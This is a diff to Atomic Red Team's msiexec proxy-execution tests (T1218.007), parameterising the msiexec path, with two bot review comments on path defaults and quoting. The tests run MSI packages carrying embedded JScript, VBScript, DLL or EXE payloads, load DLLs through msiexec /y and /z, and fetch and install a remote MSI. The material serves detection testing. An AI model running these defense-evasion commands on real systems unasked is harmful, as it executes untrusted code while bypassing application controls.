diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a9d04ae6..528e800d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -35294,6 +35294,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35314,7 +35318,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35330,6 +35334,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35350,7 +35358,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35366,6 +35374,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35386,7 +35398,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt 
@@ -35402,6 +35414,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35422,7 +35438,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35588,6 +35604,10 @@ defense-evasion: description: DLL to execute that has an implemented DllRegisterServer function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: 'The DLL must exist on disk at specified location (#{dll_payload}) @@ -35600,7 +35620,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /y "#{dll_payload}" + command: '#{msi_exe} /y "#{dll_payload}" ' name: command_prompt @@ -35619,6 +35639,10 @@ defense-evasion: function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: 'The DLL must exist on disk at specified location (#{dll_payload}) @@ -35631,7 +35655,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /z "#{dll_payload}" + command: '#{msi_exe} /z "#{dll_payload}" ' name: command_prompt 
@@ -35649,8 +35673,12 @@ defense-evasion: description: MSI file to execute type: String default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe executor: - command: 'msiexec.exe /q /i "#{msi_payload}" + command: '#{msi_exe} /q /i "#{msi_payload}" ' name: command_prompt diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index e5788f42..0f999ae8 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -47,6 +47,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -54,7 +55,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -93,6 +94,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| 
@@ -100,7 +102,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -139,6 +141,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -146,7 +149,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -185,6 +188,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -192,7 +196,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` 
@@ -415,13 +419,14 @@ Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /y "#{dll_payload}" +#{msi_exe} /y "#{dll_payload}" ``` @@ -460,13 +465,14 @@ Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: t | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /z "#{dll_payload}" +#{msi_exe} /z "#{dll_payload}" ``` @@ -505,13 +511,14 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /q /i "#{msi_payload}" +#{msi_exe} /q /i "#{msi_payload}" ``` diff --git a/atomics/T1218.007/T1218.007.yaml b/atomics/T1218.007/T1218.007.yaml index e82df5f9..6fe3f923 100644 --- a/atomics/T1218.007/T1218.007.yaml +++ b/atomics/T1218.007/T1218.007.yaml 
@@ -12,6 +12,10 @@ atomic_tests:
 description: MSI file to execute
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 action:
 description: |
 Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -27,7 +31,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /q /#{action} "#{msi_payload}"
+ #{msi_exe} /q /#{action} "#{msi_payload}"
 name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with embedded VBScript
 auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
@@ -40,6 +44,10 @@ atomic_tests:
 description: MSI file to execute
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 action:
 description: |
 Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -55,7 +63,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /q /#{action} "#{msi_payload}"
+ #{msi_exe} /q /#{action} "#{msi_payload}"
 name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with an embedded DLL
 auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
@@ -68,6 +76,10 @@ atomic_tests:
 description: MSI file to execute
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 action:
 description: |
 Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
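Review bot: The `msi_exe` default on the added lines hard-codes `c:\windows\system32\msiexec.exe`, which does not resolve on a host whose Windows directory is elsewhere. Because the executor is `command_prompt`, `default: '%SystemRoot%\System32\msiexec.exe'` (quoted, since a leading `%` is a YAML indicator) should expand at run time, assuming the runner does not resolve `Path` arguments itself, which is not visible here. The description `MSIExec File Path` also leaves the expected form of the value open; `description: Full path to the msiexec.exe binary to run` would say it. The same argument is added in the hunks at +44, +76, +108, +252, +279 and +306, and the enclosing test definition starts and ends outside this hunk.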
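Review bot: `#{msi_exe}` is substituted unquoted at the start of the command in the hunk at +31, while `#{msi_payload}` on the same line is quoted, so any override that contains a space is split by cmd and the test fails before msiexec starts. Consider `"#{msi_exe}" /q /#{action} "#{msi_payload}"`, after confirming how the runner hands the line to cmd, because a line that begins with a quote is subject to cmd's quote-stripping rules. The prerequisite block, which starts above the hunk, appears to check only the payload; a dependency that runs `Test-Path` on `#{msi_exe}` would keep a mistyped path from being recorded as an executed test that produced no telemetry. The same unquoted substitution is in the command hunks at +63, +95, +127, +266, +293 and +306.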
@@ -83,7 +95,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /q /#{action} "#{msi_payload}"
+ #{msi_exe} /q /#{action} "#{msi_payload}"
 name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with an embedded EXE
 auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
@@ -96,6 +108,10 @@ atomic_tests:
 description: MSI file to execute
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 action:
 description: |
 Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -111,7 +127,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /q /#{action} "#{msi_payload}"
+ #{msi_exe} /q /#{action} "#{msi_payload}"
 name: command_prompt
 - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
 auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
@@ -236,6 +252,10 @@ atomic_tests:
 description: DLL to execute that has an implemented DllRegisterServer function
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 dependency_executor_name: powershell
 dependencies:
 - description: |
@@ -246,7 +266,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /y "#{dll_payload}"
+ #{msi_exe} /y "#{dll_payload}"
 name: command_prompt
 - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
 auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
@@ -259,6 +279,10 @@ atomic_tests:
 description: DLL to execute that has an implemented DllUnregisterServer function
 type: Path
 default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 dependency_executor_name: powershell
 dependencies:
 - description: |
@@ -269,7 +293,7 @@ atomic_tests:
 Write-Host "You must provide your own MSI"
 executor:
 command: |
- msiexec.exe /z "#{dll_payload}"
+ #{msi_exe} /z "#{dll_payload}"
 name: command_prompt
 - name: Msiexec.exe - Execute Remote MSI file
 auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
@@ -282,7 +306,11 @@ atomic_tests:
 description: MSI file to execute
 type: String
 default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
+ msi_exe:
+ description: MSIExec File Path
+ type: Path
+ default: c:\windows\system32\msiexec.exe
 executor:
 command: |
- msiexec.exe /q /i "#{msi_payload}"
+ #{msi_exe} /q /i "#{msi_payload}"
 name: command_prompt
\ No newline at end of file